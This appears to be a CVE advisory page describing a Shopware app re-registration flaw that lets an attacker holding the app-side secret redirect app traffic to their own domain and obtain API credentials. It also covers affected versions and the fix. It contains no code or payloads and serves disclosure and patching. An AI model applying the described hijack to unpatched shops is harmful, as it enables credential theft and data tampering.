Shopware has a potential take over of app credentials
Description
Shopware is an open commerce platform. Prior to 6.6.10.15 and 6.7.8.1, a vulnerability in the Shopware app registration flow that could, under specific conditions, allow attackers to take over the communication channel between a shop and an app. The legacy app registration flow used HMAC‑based authentication without sufficiently binding a shop installation to its original domain. During re‑registration, the shop-url could be updated without proving control over the previously registered shop or domain. This made targeted hijacking of app communication feasible if an attacker possessed the relevant app‑side secret. By abusing app re‑registration, an attacker could redirect app traffic to an attacker‑controlled domain and potentially obtain API credentials intended for the legitimate shop. This vulnerability is fixed in 6.6.10.15 and 6.7.8.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Shopware app registration flow allows domain hijacking during re-registration, enabling attackers to redirect app traffic and steal API credentials.
Vulnerability
The vulnerability resides in the Shopware app registration flow, prior to versions 6.6.10.15 and 6.7.8.1 [1]. The legacy HMAC-based authentication did not sufficiently bind a shop installation to its original domain. During re-registration, the shop-url could be updated without proving continued control over the previously registered domain [1][3]. This allowed an attacker with knowledge of the app-side secret to hijack the communication channel between a shop and its app [3].
Exploitation
To exploit this vulnerability, an attacker must possess the relevant app-side secret—such as that used in HMAC signing during the legacy registration flow [1][3]. By abusing the re-registration process, the attacker can update the shop's registered URL to a domain under their control. This does not require authentication as the shop owner and no proof of domain control is needed during the re-registration step [3]. The attack targets the app system's registration mechanism, not core storefront or administration authentication, so exploitation may go unnoticed as an 'app malfunction' [3].
Impact
A successful attack allows the attacker to register an existing app installation under a domain they control, enabling interception of App-to-Shop communication [3]. This can lead to data tampering ('data poisoning') and the theft of API integration credentials that grant the permissions originally assigned to the app [3]. The compromise is limited to the app ecosystem but can expose sensitive shop data and functionality depending on the app's permissions [3].
Mitigation
Shopware has fixed the vulnerability in versions 6.6.10.15 and 6.7.8.1 by hardening the registration and re-registration process, including adding a dual signature requirement and other binding controls [1][3]. Users are advised to update immediately. As an interim measure, cloud installations can rely on the latest Shopware Security Plugin [3]. Shopware services and first-party apps using the affected SDKs have also been reviewed and patched [3].
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
shopware/platformPackagist | >= 6.7.0.0, < 6.7.8.1 | 6.7.8.1 |
shopware/platformPackagist | < 6.6.10.15 | 6.6.10.15 |
shopware/corePackagist | >= 6.7.0.0, < 6.7.8.1 | 6.7.8.1 |
shopware/corePackagist | < 6.6.10.15 | 6.6.10.15 |
Affected products
3- shopware/corev5Range: >= 6.7.0.0, < 6.7.8.1
- shopware/platformv5Range: >= 6.7.0.0, < 6.7.8.1
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- github.com/advisories/GHSA-c4p7-rwrg-pf6pghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-31889ghsaADVISORY
- github.com/shopware/shopware/security/advisories/GHSA-c4p7-rwrg-pf6pghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.